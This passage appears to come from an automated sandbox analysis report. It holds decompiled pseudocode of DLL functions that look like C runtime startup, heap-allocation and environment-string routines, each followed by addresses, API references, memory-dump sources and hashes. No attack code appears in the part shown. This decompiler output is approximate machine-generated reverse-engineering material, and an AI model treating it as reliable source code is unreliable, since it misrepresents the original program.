                                                                                                                                                                                                                                			E736D6F04(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                				char _t44;
                                                                                                                                                                                                                                				signed int _t48;
                                                                                                                                                                                                                                				signed int _t54;
                                                                                                                                                                                                                                				signed int _t55;
                                                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                                                				signed char _t67;
                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                				signed int _t86;
                                                                                                                                                                                                                                				void* _t90;
                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                				signed int _t110;
                                                                                                                                                                                                                                				signed int _t115;
                                                                                                                                                                                                                                				signed int _t119;
                                                                                                                                                                                                                                				intOrPtr* _t121;
                                                                                                                                                                                                                                				void* _t123;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t113 = __esi;
                                                                                                                                                                                                                                				_t106 = __edi;
                                                                                                                                                                                                                                				_t105 = __edx;
                                                                                                                                                                                                                                				_push(0x10);
                                                                                                                                                                                                                                				E736D7870(__ebx, __edi, __esi);
                                                                                                                                                                                                                                				_t43 = E736D754E(__ecx, __edx, 0); // executed
                                                                                                                                                                                                                                				_t90 = 0x736e99e8;
                                                                                                                                                                                                                                				if(_t43 == 0) {
                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                					_t44 = 0;
                                                                                                                                                                                                                                					__eflags = 0;
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					 *((char*)(_t123 - 0x1d)) = E736D7453();
                                                                                                                                                                                                                                					_t85 = 1;
                                                                                                                                                                                                                                					 *((char*)(_t123 - 0x19)) = 1;
                                                                                                                                                                                                                                					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                                                                                                                                                                                                                                					_t132 =  *0x736ef460;
                                                                                                                                                                                                                                					if( *0x736ef460 != 0) {
                                                                                                                                                                                                                                						E736D76ED(_t105, __edi, __esi, 7);
                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                						_push(0x10);
                                                                                                                                                                                                                                						_push(0x736e9a08);
                                                                                                                                                                                                                                						E736D7870(1, __edi, __esi);
                                                                                                                                                                                                                                						_t48 =  *0x736ef120; // 0x1
                                                                                                                                                                                                                                						__eflags = _t48;
                                                                                                                                                                                                                                						if(_t48 > 0) {
                                                                                                                                                                                                                                							 *0x736ef120 = _t48 - 1;
                                                                                                                                                                                                                                							 *(_t123 - 0x1c) = 1;
                                                                                                                                                                                                                                							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                                                                                                                                                                                                                                							 *((char*)(_t123 - 0x20)) = E736D7453();
                                                                                                                                                                                                                                							 *(_t123 - 4) = 1;
                                                                                                                                                                                                                                							__eflags =  *0x736ef460 - 2;
                                                                                                                                                                                                                                							if( *0x736ef460 != 2) {
                                                                                                                                                                                                                                								E736D76ED(_t105, 1, _t113, 7);
                                                                                                                                                                                                                                								asm("int3");
                                                                                                                                                                                                                                								_push(0xc);
                                                                                                                                                                                                                                								_push(0x736e9a30);
                                                                                                                                                                                                                                								E736D7870(1, 1, _t113);
                                                                                                                                                                                                                                								_t110 =  *(_t123 + 0xc);
                                                                                                                                                                                                                                								__eflags = _t110;
                                                                                                                                                                                                                                								if(_t110 != 0) {
                                                                                                                                                                                                                                									L23:
                                                                                                                                                                                                                                									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                                                                                                                                                                                                                                									__eflags = _t110 - 1;
                                                                                                                                                                                                                                									if(_t110 == 1) {
                                                                                                                                                                                                                                										L26:
                                                                                                                                                                                                                                										_t86 =  *(_t123 + 0x10);
                                                                                                                                                                                                                                										_t115 = E736D71C6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
                                                                                                                                                                                                                                										 *(_t123 - 0x1c) = _t115;
                                                                                                                                                                                                                                										__eflags = _t115;
                                                                                                                                                                                                                                										if(_t115 != 0) {
                                                                                                                                                                                                                                											_t55 = E736D6EB1(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
                                                                                                                                                                                                                                											_t115 = _t55;
                                                                                                                                                                                                                                											 *(_t123 - 0x1c) = _t115;
                                                                                                                                                                                                                                											__eflags = _t115;
                                                                                                                                                                                                                                											if(_t115 != 0) {
                                                                                                                                                                                                                                												goto L28;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										__eflags = _t110 - 2;
                                                                                                                                                                                                                                										if(_t110 == 2) {
                                                                                                                                                                                                                                											goto L26;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t86 =  *(_t123 + 0x10);
                                                                                                                                                                                                                                											L28:
                                                                                                                                                                                                                                											_push(_t86);
                                                                                                                                                                                                                                											_t115 = E736D6490( *((intOrPtr*)(_t123 + 8)), _t110);
                                                                                                                                                                                                                                											 *(_t123 - 0x1c) = _t115;
                                                                                                                                                                                                                                											__eflags = _t110 - 1;
                                                                                                                                                                                                                                											if(_t110 == 1) {
                                                                                                                                                                                                                                												__eflags = _t115;
                                                                                                                                                                                                                                												if(_t115 == 0) {
                                                                                                                                                                                                                                													_push(_t86);
                                                                                                                                                                                                                                													_t59 = E736D6490( *((intOrPtr*)(_t123 + 8)), _t56);
                                                                                                                                                                                                                                													__eflags = _t86;
                                                                                                                                                                                                                                													_t34 = _t86 != 0;
                                                                                                                                                                                                                                													__eflags = _t34;
                                                                                                                                                                                                                                													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
                                                                                                                                                                                                                                													L14();
                                                                                                                                                                                                                                													_pop(_t90);
                                                                                                                                                                                                                                													E736D71C6( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                											__eflags = _t110;
                                                                                                                                                                                                                                											if(_t110 == 0) {
                                                                                                                                                                                                                                												L33:
                                                                                                                                                                                                                                												_t115 = E736D6EB1(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
                                                                                                                                                                                                                                												 *(_t123 - 0x1c) = _t115;
                                                                                                                                                                                                                                												__eflags = _t115;
                                                                                                                                                                                                                                												if(_t115 != 0) {
                                                                                                                                                                                                                                													_t115 = E736D71C6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
                                                                                                                                                                                                                                													 *(_t123 - 0x1c) = _t115;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												__eflags = _t110 - 3;
                                                                                                                                                                                                                                												if(_t110 == 3) {
                                                                                                                                                                                                                                													goto L33;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									 *(_t123 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                									_t54 = _t115;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									__eflags =  *0x736ef120 - _t110; // 0x1
                                                                                                                                                                                                                                									if(__eflags > 0) {
                                                                                                                                                                                                                                										goto L23;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t54 = 0;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
                                                                                                                                                                                                                                								return _t54;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								E736D751E(1, _t90, 1, _t113);
                                                                                                                                                                                                                                								E736D73DA();
                                                                                                                                                                                                                                								E736D783C();
                                                                                                                                                                                                                                								 *0x736ef460 =  *0x736ef460 & 0x00000000;
                                                                                                                                                                                                                                								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                                                                                                                                                                                                                                								E736D70A0();
                                                                                                                                                                                                                                								_t67 = E736D76BF( *((intOrPtr*)(_t123 + 8)), 0);
                                                                                                                                                                                                                                								asm("sbb esi, esi");
                                                                                                                                                                                                                                								_t119 =  ~(_t67 & 0x000000ff) & 1;
                                                                                                                                                                                                                                								__eflags = _t119;
                                                                                                                                                                                                                                								 *(_t123 - 0x1c) = _t119;
                                                                                                                                                                                                                                								 *(_t123 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                								E736D70AD();
                                                                                                                                                                                                                                								_t69 = _t119;
                                                                                                                                                                                                                                								goto L18;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t69 = 0;
                                                                                                                                                                                                                                							L18:
                                                                                                                                                                                                                                							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
                                                                                                                                                                                                                                							return _t69;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						 *0x736ef460 = 1;
                                                                                                                                                                                                                                						if(E736D74B0(_t132) != 0) {
                                                                                                                                                                                                                                							E736D73CE(E736D7810());
                                                                                                                                                                                                                                							E736D73F2();
                                                                                                                                                                                                                                							_t80 = E736D8A97(0x736e1114, 0x736e1124);
                                                                                                                                                                                                                                							_pop(_t102);
                                                                                                                                                                                                                                							if(_t80 == 0 && E736D7485(1, _t102) != 0) {
                                                                                                                                                                                                                                								E736D8A50(_t102, 0x736e1108, 0x736e1110);
                                                                                                                                                                                                                                								 *0x736ef460 = 2;
                                                                                                                                                                                                                                								_t85 = 0;
                                                                                                                                                                                                                                								 *((char*)(_t123 - 0x19)) = 0;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *(_t123 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                						E736D6FE7();
                                                                                                                                                                                                                                						if(_t85 != 0) {
                                                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t121 = E736D76E7();
                                                                                                                                                                                                                                							_t138 =  *_t121;
                                                                                                                                                                                                                                							if( *_t121 != 0) {
                                                                                                                                                                                                                                								_push(_t121);
                                                                                                                                                                                                                                								if(E736D760E(_t85, _t106, _t121, _t138) != 0) {
                                                                                                                                                                                                                                									 *0x736e1104( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
                                                                                                                                                                                                                                									 *((intOrPtr*)( *_t121))();
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							 *0x736ef120 =  *0x736ef120 + 1;
                                                                                                                                                                                                                                							_t44 = 1;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L12:
                                                                                                                                                                                                                                						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
                                                                                                                                                                                                                                						return _t44;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                0x736d70e1
                                                                                                                                                                                                                                0x736d70e4
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70fd
                                                                                                                                                                                                                                0x736d70ff
                                                                                                                                                                                                                                0x736d7102
                                                                                                                                                                                                                                0x736d7104
                                                                                                                                                                                                                                0x736d710f
                                                                                                                                                                                                                                0x736d7114
                                                                                                                                                                                                                                0x736d7116
                                                                                                                                                                                                                                0x736d7119
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d712b
                                                                                                                                                                                                                                0x736d712d
                                                                                                                                                                                                                                0x736d7130
                                                                                                                                                                                                                                0x736d7133
                                                                                                                                                                                                                                0x736d7135
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d7139
                                                                                                                                                                                                                                0x736d713e
                                                                                                                                                                                                                                0x736d7143
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d714b
                                                                                                                                                                                                                                0x736d714c
                                                                                                                                                                                                                                0x736d7151
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d715c
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d7165
                                                                                                                                                                                                                                0x736d716f
                                                                                                                                                                                                                                0x736d7171
                                                                                                                                                                                                                                0x736d7174
                                                                                                                                                                                                                                0x736d7176
                                                                                                                                                                                                                                0x736d7182
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x736d71ad
                                                                                                                                                                                                                                0x736d71b4
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x736d71b9
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d704d
                                                                                                                                                                                                                                0x736d7052
                                                                                                                                                                                                                                0x736d7057
                                                                                                                                                                                                                                0x736d705e
                                                                                                                                                                                                                                0x736d7062
                                                                                                                                                                                                                                0x736d706c
                                                                                                                                                                                                                                0x736d7078
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707c
                                                                                                                                                                                                                                0x736d707f
                                                                                                                                                                                                                                0x736d7086
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d708d
                                                                                                                                                                                                                                0x736d7090
                                                                                                                                                                                                                                0x736d709c
                                                                                                                                                                                                                                0x736d709c
                                                                                                                                                                                                                                0x736d6f3e
                                                                                                                                                                                                                                0x736d6f3e
                                                                                                                                                                                                                                0x736d6f4f
                                                                                                                                                                                                                                0x736d6f56
                                                                                                                                                                                                                                0x736d6f5b
                                                                                                                                                                                                                                0x736d6f6a
                                                                                                                                                                                                                                0x736d6f70
                                                                                                                                                                                                                                0x736d6f73
                                                                                                                                                                                                                                0x736d6f88
                                                                                                                                                                                                                                0x736d6f8f
                                                                                                                                                                                                                                0x736d6f99
                                                                                                                                                                                                                                0x736d6f9b
                                                                                                                                                                                                                                0x736d6f9b
                                                                                                                                                                                                                                0x736d6f73
                                                                                                                                                                                                                                0x736d6f9e
                                                                                                                                                                                                                                0x736d6fa5
                                                                                                                                                                                                                                0x736d6fac
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6fae
                                                                                                                                                                                                                                0x736d6fb3
                                                                                                                                                                                                                                0x736d6fb5
                                                                                                                                                                                                                                0x736d6fb8
                                                                                                                                                                                                                                0x736d6fba
                                                                                                                                                                                                                                0x736d6fc3
                                                                                                                                                                                                                                0x736d6fd1

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 736D6F51
                                                                                                                                                                                                                                  • Part of subcall function 736D73CE: InitializeSListHead.KERNEL32(736EF448,736D6F5B,736E99E8,00000010,736D6EEC,?,?,?,736D7114,?,00000001,?,?,00000001,?,736E9A30), ref: 736D73D3
                                                                                                                                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 736D6FBB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3231365870-0
                                                                                                                                                                                                                                • Opcode ID: 92dc1fbbad248915742f132f2745e72c64013d6888604876192229e64edc6065
                                                                                                                                                                                                                                • Instruction ID: 1c5554c09717eb42efe43cba12dfe30ed7c7a9443ed4e3c542d528e0cf00d5be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92dc1fbbad248915742f132f2745e72c64013d6888604876192229e64edc6065
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 582135366A9B049FEF01AFB8C9043DC3BA2AF01229F540459D8866F0C2DF315048CA6B
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D91EC(void* __eax, void* __ebx, void* __ecx, void* __edx) {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x736d91f1

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DB679: GetEnvironmentStringsW.KERNEL32 ref: 736DB682
                                                                                                                                                                                                                                  • Part of subcall function 736DB679: _free.LIBCMT ref: 736DB6E1
                                                                                                                                                                                                                                  • Part of subcall function 736DB679: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 736DB6F0
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D922C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9233
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$EnvironmentStrings$Free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2490078468-0
                                                                                                                                                                                                                                • Opcode ID: f727bfe0ca4f4f60fd33e8306e14971852a08de9ef515ba69526d3fe493a66c0
                                                                                                                                                                                                                                • Instruction ID: 8de06711ceb887746b8d78210eff3ebba2388ef234b580fe9b1236063579176e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f727bfe0ca4f4f60fd33e8306e14971852a08de9ef515ba69526d3fe493a66c0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8E02B239BE71167FF535A3B7C0030937C56B82330B56031AD820DB1D9FA70C416019D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DA236(signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                				signed int _t18;
                                                                                                                                                                                                                                				long _t19;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t18 = _a4;
                                                                                                                                                                                                                                				if(_t18 == 0) {
                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                					_t19 = _t18 * _a8;
                                                                                                                                                                                                                                					if(_t19 == 0) {
                                                                                                                                                                                                                                						_t19 = _t19 + 1;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                						_t8 = RtlAllocateHeap( *0x736efae0, 8, _t19); // executed
                                                                                                                                                                                                                                						if(_t8 != 0) {
                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__eflags = E736DCC5C();
                                                                                                                                                                                                                                						if(__eflags == 0) {
                                                                                                                                                                                                                                							L8:
                                                                                                                                                                                                                                							 *((intOrPtr*)(E736DA223(__eflags))) = 0xc;
                                                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                                                							return 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__eflags = E736DBE4F(__eflags, _t19);
                                                                                                                                                                                                                                						if(__eflags == 0) {
                                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					return _t8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t13 = 0xffffffe0;
                                                                                                                                                                                                                                				if(_t13 / _t18 < _a8) {
                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,736D9E35,00000001,00000364,00000007,000000FF,?,00000001,736DA228,736DA2B9,?,?,736D94E3), ref: 736DA277
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: 4873eb1b7c1cca0ddc2fdeb48710fde983e6a351e0f25cc83889d3253f583914
                                                                                                                                                                                                                                • Instruction ID: 03dd7258cfd7b65978eb93572a1008260d6ecb2ecc2c8459984fbac93de06f7b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4873eb1b7c1cca0ddc2fdeb48710fde983e6a351e0f25cc83889d3253f583914
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76F0E93297D2246BEF125A37DA04B5B3768AF81F70B1C4111EC0ADB3C8CA62D52082E8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DC5DF(long _a4) {
                                                                                                                                                                                                                                				void* _t4;
                                                                                                                                                                                                                                				long _t8;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t8 = _a4;
                                                                                                                                                                                                                                				if(_t8 > 0xffffffe0) {
                                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                                					 *((intOrPtr*)(E736DA223(__eflags))) = 0xc;
                                                                                                                                                                                                                                					__eflags = 0;
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_t8 == 0) {
                                                                                                                                                                                                                                					_t8 = _t8 + 1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t4 = RtlAllocateHeap( *0x736efae0, 0, _t8); // executed
                                                                                                                                                                                                                                					if(_t4 != 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					__eflags = E736DCC5C();
                                                                                                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					__eflags = E736DBE4F(__eflags, _t8);
                                                                                                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t4;
                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,736DC31E,736DC31E,?,736DB04A,00000220,?,736DC31E,?,?,?,?,736DE432,00000001,?,?), ref: 736DC611
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: d29058318656684a1c306c4ee9d28767506024c06951c62a557ce39430923180
                                                                                                                                                                                                                                • Instruction ID: dcf5a7b9e3f7d9d11b665678a14681b08d068cbfda15a35909a88ff140b96ecf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d29058318656684a1c306c4ee9d28767506024c06951c62a557ce39430923180
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAE02B3193525867EF13166BCE04B477658AF455E1F192110EC8BA60C4CB60C42045E8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D76ED(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                				char _v0;
                                                                                                                                                                                                                                				struct _EXCEPTION_POINTERS _v12;
                                                                                                                                                                                                                                				intOrPtr _v80;
                                                                                                                                                                                                                                				intOrPtr _v88;
                                                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                                                				intOrPtr _v608;
                                                                                                                                                                                                                                				intOrPtr _v612;
                                                                                                                                                                                                                                				void* _v616;
                                                                                                                                                                                                                                				intOrPtr _v620;
                                                                                                                                                                                                                                				char _v624;
                                                                                                                                                                                                                                				intOrPtr _v628;
                                                                                                                                                                                                                                				intOrPtr _v632;
                                                                                                                                                                                                                                				intOrPtr _v636;
                                                                                                                                                                                                                                				intOrPtr _v640;
                                                                                                                                                                                                                                				intOrPtr _v644;
                                                                                                                                                                                                                                				intOrPtr _v648;
                                                                                                                                                                                                                                				intOrPtr _v652;
                                                                                                                                                                                                                                				intOrPtr _v656;
                                                                                                                                                                                                                                				intOrPtr _v660;
                                                                                                                                                                                                                                				intOrPtr _v664;
                                                                                                                                                                                                                                				intOrPtr _v668;
                                                                                                                                                                                                                                				char _v808;
                                                                                                                                                                                                                                				char* _t39;
                                                                                                                                                                                                                                				long _t49;
                                                                                                                                                                                                                                				intOrPtr _t51;
                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                				intOrPtr _t55;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                                                				intOrPtr _t59;
                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                
